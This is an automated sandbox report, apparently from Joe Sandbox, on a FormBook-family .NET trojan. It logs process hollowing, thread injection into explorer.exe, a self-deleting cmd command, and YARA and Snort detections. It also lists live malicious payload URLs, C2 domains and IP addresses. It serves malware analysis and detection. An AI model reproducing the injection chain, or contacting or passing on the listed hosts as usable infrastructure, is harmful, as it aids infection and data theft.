        Maps a DLL or memory area into another process
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 97B008
        .NET source code references suspicious native API functions
        Source: U8RYIwIvfK.exe, u200b???????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u200b???????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3452
        Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3452
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.316353036.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
        Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.326808107.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.346736658.0000000005D90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.316353036.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeQueries volume information: C:\Users\user\Desktop\U8RYIwIvfK.exe VolumeInformation
        Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D3C49 GetSystemTime,SystemTimeToFileTime,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B443C GetVersion,

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Valid Accounts        		1
        Native API        		1
        Valid Accounts        		1
        Valid Accounts        		1
        Rootkit        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Credential API Hooking        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Shared Modules        		Boot or Logon Initialization Scripts1
        Access Token Manipulation        		1
        Masquerading        		LSASS Memory241
        Security Software Discovery        		Remote Desktop Protocol11
        Archive Collected Data        		Exfiltration Over Bluetooth3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)812
        Process Injection        		1
        Valid Accounts        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Access Token Manipulation        		NTDS31
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput CaptureScheduled Transfer14
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Disable or Modify Tools        		LSA Secrets1
        Remote System Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common31
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items812
        Process Injection        		DCSync125
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
        Deobfuscate/Decode Files or Information        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)3
        Obfuscated Files or Information        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
        Software Packing        		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 736964 Sample: U8RYIwIvfK.exe Startdate: 03/11/2022 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic 2->41 43 Multi AV Scanner detection for domain / URL 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 8 other signatures 2->47 10 U8RYIwIvfK.exe 15 3 2->10         started        process3 dnsIp4 39 tgc8x.tk 50.115.174.192, 443, 49701, 49704 VIRPUS United States 10->39 33 C:\Users\user\AppData\...\U8RYIwIvfK.exe.log, CSV 10->33 dropped 57 Writes to foreign memory regions 10->57 59 Allocates memory in foreign processes 10->59 61 Injects a PE file into a foreign processes 10->61 63 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->63 15 aspnet_compiler.exe 10->15         started        18 aspnet_compiler.exe 10->18         started        20 aspnet_compiler.exe 10->20         started        file5 signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 22 explorer.exe 15->22 injected 73 Tries to detect virtualization through RDTSC time measurements 18->73 process9 dnsIp10 35 www.mercydm.mobi 22->35 37 mercydm.mobi 34.102.136.180, 49705, 80 GOOGLEUS United States 22->37 49 System process connects to network (likely due to code injection or exploit) 22->49 26 cmd.exe 22->26         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 26->51 53 Maps a DLL or memory area into another process 26->53 55 Tries to detect virtualization through RDTSC time measurements 26->55 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        U8RYIwIvfK.exe44%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        U8RYIwIvfK.exe38%VirustotalBrowse
        U8RYIwIvfK.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        3.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        tgc8x.tk6%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://tgc8x.tk/tt/ptrr.txt3%VirustotalBrowse
        https://tgc8x.tk7%VirustotalBrowse
        http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt0%Avira URL Cloudsafe
        https://tgc8x.tk0%Avira URL Cloudsafe
        www.ept-egy.com/zx85/0%VirustotalBrowse
        www.ept-egy.com/zx85/0%Avira URL Cloudsafe
        http://tgc8x.tk0%Avira URL Cloudsafe
        https://tgc8x.tk/tt/ptrr.txt100%Avira URL Cloudphishing
        https://tgc8x.tkD80%Avira URL Cloudsafe
        https://tgc8x.tk40%Avira URL Cloudsafe
        https://tgc8x.tk/tt/BLACKDEV.txt100%Avira URL Cloudphishing

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        tgc8x.tk
        		50.115.174.192
        		truetrueunknown
        mercydm.mobi
        		34.102.136.180
        		truefalse
          		unknown
          www.mercydm.mobi
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://tgc8x.tk/tt/BLACKDEV.txttrue
            • Avira URL Cloud: phishing
            		unknown
            https://tgc8x.tk/tt/ptrr.txttrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		unknown
            www.ept-egy.com/zx85/true
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		low
            http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTtfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.295686843.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.352239311.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270907548.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341973422.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://tgc8x.tkU8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmptrue
              • 7%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://tgc8x.tk4U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameU8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://tgc8x.tkU8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://tgc8x.tkD8U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                50.115.174.192
                		tgc8x.tkUnited States
                		32875VIRPUStrue
                34.102.136.180
                		mercydm.mobiUnited States
                		15169GOOGLEUSfalse

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:736964
                Start date and time:2022-11-03 12:38:55 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 48s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:U8RYIwIvfK.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@11/1@2/2
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 60.4% (good quality ratio 54.2%)
                • Quality average: 70.2%
                • Quality standard deviation: 31.4%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:40:00API Interceptor1x Sleep call for process: U8RYIwIvfK.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8RYIwIvfK.exe.log

                Download File
                Process:C:\Users\user\Desktop\U8RYIwIvfK.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):847
                Entropy (8bit):5.35816127824051
                Encrypted:false
                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                MD5:31E089E21A2AEB18A2A23D3E61EB2167
                SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):5.8598559767101115
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:U8RYIwIvfK.exe
                File size:74240
                MD5:6f53598b9c19b30a0cf3ff0432301708
                SHA1:4bd8e67e468adfbfddd9e5a1e47fdf318bf9a31b
                SHA256:6d3397c687aea5017b90a5e96adc6fbfb0429d56a8b2ead1f1d4273994952379
                SHA512:e655648f950b90261fd2b54be1ebfee9780ff466351d1cc4b1a675c41329fc5eae62f20ccb9423d3ee4e3457c7a8ed63b14bc2e30f205a4512122301ce2d1541
                SSDEEP:1536:7BKK5PX8Q01Hb20oJ0fekpamVGfhCW7j:lKSx0177ouekpamVGfhCW7j
                TLSH:E573EC8D766071DFC85BC872CEA82C68EA64747B531BD203A45326AD9E0D99BCF150F3
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;cc..............0..............%... ...@....@.. ..............................w%....`................................

                File Icon

                Icon Hash:30f0c4ccccc6b010

                Static PE Info

                General

                Entrypoint:0x4125ee
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x63633BBE [Thu Nov 3 03:55:42 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x125a00x4b.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x1746.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x125580x1c.text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x105f40x10600False0.4767861402671756data5.884370189804151IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x140000x17460x1800False0.2711588541666667data4.422035362903512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x160000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x141640x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                RT_GROUP_ICON0x1520c0x14data
                RT_VERSION0x152200x33cdata
                RT_MANIFEST0x1555c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                50.115.174.192192.168.2.6443497042018856 11/03/22-12:39:59.450093TCP2018856ET TROJAN Windows executable base64 encoded4434970450.115.174.192192.168.2.6
                192.168.2.68.8.8.859575532012811 11/03/22-12:39:56.025984UDP2012811ET DNS Query to a .tk domain - Likely Hostile5957553192.168.2.68.8.8.8

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Nov 3, 2022 12:39:56.396153927 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:56.396225929 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:56.396327019 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:56.450129986 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:56.450177908 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:56.835751057 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:56.835985899 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:56.848099947 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:56.848124027 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:56.848771095 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:56.919364929 CET49701443192.168.2.650.115.174.192
